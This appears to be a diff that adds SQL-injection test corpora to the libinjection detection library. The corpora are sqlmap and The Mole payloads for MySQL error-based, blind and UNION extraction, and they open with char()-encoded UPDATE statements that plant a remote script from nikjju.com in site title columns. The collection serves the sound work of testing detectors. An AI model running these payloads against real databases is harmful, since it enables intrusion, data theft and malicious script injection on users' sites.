21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Content+set+Content_Title=cast(Content_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Homepage+set+Homepage_Title=cast(Homepage_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
36765
libinjection/data/sqli-sqlmap-20130419.txt
Normal file
36765
libinjection/data/sqli-sqlmap-20130419.txt
Normal file
File diff suppressed because it is too large
Load diff
100
libinjection/data/sqli-sqlmap-20160724.txt
Normal file
100
libinjection/data/sqli-sqlmap-20160724.txt
Normal file
|
@ -0,0 +1,100 @@
|
|||
# https://github.com/client9/libinjection/issues/109
|
||||
#
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))# YxEq
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- TscQ
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))# cDdL
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- DIOu
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))FsPL)
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(45=28,0,5)))))vxEi)
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6715=6715,0,5)))))Hfle) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6958>6957,0,5)))))sets)
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ZBav"="ZBav
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ekgZ" LIKE "ekgZ
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ikjC
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "AinJ"="AinJ
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "ULyg" LIKE "ULyg
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- qLff
|
||||
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("ReEg" LIKE "ReEg
|
||||
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("SiLv"="SiLv
|
||||
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("QwEf"="QwEf
|
||||
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("acRz" LIKE "acRz
|
||||
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("RJVy" LIKE "RJVy
|
||||
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("rTWb"="rTWb
|
||||
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("AWGS" LIKE "AWGS
|
||||
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("ObjI"="ObjI
|
||||
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("SgCv" LIKE "SgCv
|
||||
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("vYkA"="vYkA
|
||||
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("TAfM"="TAfM
|
||||
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("YVzA" LIKE "YVzA
|
||||
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("XwuG"="XwuG
|
||||
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("tENF" LIKE "tENF
|
||||
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("fLDW" LIKE "fLDW
|
||||
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("lEki"="lEki
|
||||
"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("enRJ" LIKE "enRJ
|
||||
1"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("zhFB"="zhFB
|
||||
1%" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "%"="
|
||||
1%" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "%"="
|
||||
1%") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("%"="
|
||||
1%") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("%"="
|
||||
1%") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("%"="
|
||||
1%")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("%"="
|
||||
1%")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("%"="
|
||||
1%")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("%"="
|
||||
1%"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("%"="
|
||||
1%"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("%"="
|
||||
1%"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("%"="
|
||||
1%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND '%'='
|
||||
1%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND '%'='
|
||||
1%') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('%'='
|
||||
1%') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('%'='
|
||||
1%') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('%'='
|
||||
1%')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('%'='
|
||||
1%')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('%'='
|
||||
1%')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('%'='
|
||||
1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('%'='
|
||||
1%'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('%'='
|
||||
1%'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('%'='
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eLVs'='eLVs
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eVVr' LIKE 'eVVr
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- OiYW
|
||||
1' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)#
|
||||
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2270=3285) THEN 1 ELSE 0x28 END))#
|
||||
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (7449=7449) THEN 1 ELSE 0x28 END))#
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'BiBK' LIKE 'BiBK
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'PqYc'='PqYc
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- WaOc
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('bgJB'='bgJB
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('nPXQ' LIKE 'nPXQ
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ahKA
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('MTGN'='MTGN
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('UTnW' LIKE 'UTnW
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- jjec
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('apRZ'='apRZ
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('uTOg' LIKE 'uTOg
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- zMbs
|
||||
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('BQCu' LIKE 'BQCu
|
||||
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('dmjR'='dmjR
|
||||
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('OhUO' LIKE 'OhUO
|
||||
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('sonC'='sonC
|
||||
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('LfMY'='LfMY
|
||||
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('MWjv' LIKE 'MWjv
|
||||
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('FTHS'='FTHS
|
||||
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('igdM' LIKE 'igdM
|
||||
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('WZKG' LIKE 'WZKG
|
||||
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('yWmg'='yWmg
|
||||
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('FUsX' LIKE 'FUsX
|
||||
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('mBLH'='mBLH
|
||||
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (3370=3370
|
||||
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- rXfN
|
||||
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (9212=9212
|
||||
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- KZqT
|
||||
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (9114=9114
|
||||
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- eHGn
|
||||
1)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((2068=2068
|
||||
1)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((7248=7248
|
||||
1)) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((3064=3064
|
||||
1))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (((5697=5697
|
||||
1))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (((1805=1805
|
||||
1))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (((5031=5031
|
||||
EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7671,(SELECT (ELT(7823=7823,1))),0x7162716b71,0x78))x))
|
31886
libinjection/data/sqli-sqlmap.txt
Normal file
31886
libinjection/data/sqli-sqlmap.txt
Normal file
File diff suppressed because it is too large
Load diff
22
libinjection/data/sqli-sqlmap_examples.txt
Normal file
22
libinjection/data/sqli-sqlmap_examples.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
#
|
||||
# Attacks pulled out of the examples from SQLMAP
|
||||
#
|
||||
|
||||
# https:#svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mssqlhash.py
|
||||
1%23%0AAND%23%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2morehash.py
|
||||
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py
|
||||
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2dash.py
|
||||
1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/modsecurityzeroversioned.py
|
||||
1+/*!00000AND+2>1*/--'
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/halfversionedmorekeywords.py
|
||||
value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
|
||||
|
56
libinjection/data/sqli-themole.txt
Normal file
56
libinjection/data/sqli-themole.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
1' and '1' like '1
|
||||
1' and '1' like '0
|
||||
1' and 0 < (select length(@@version)) and '1' like '1
|
||||
1' own3d by 1
|
||||
1' order by 1#
|
||||
1' order by 15000#
|
||||
1' order by 2 #
|
||||
1' order by 4 #
|
||||
1' order by 3 #
|
||||
1' and 1=0 union all select 0x373134,0x373135#
|
||||
1' and 1 = 0 UNION ALL SELECT 0,CONCAT(@@version,0x5468655f4d6f6c652e46316e67657221)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.schemata where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 0 #
|
||||
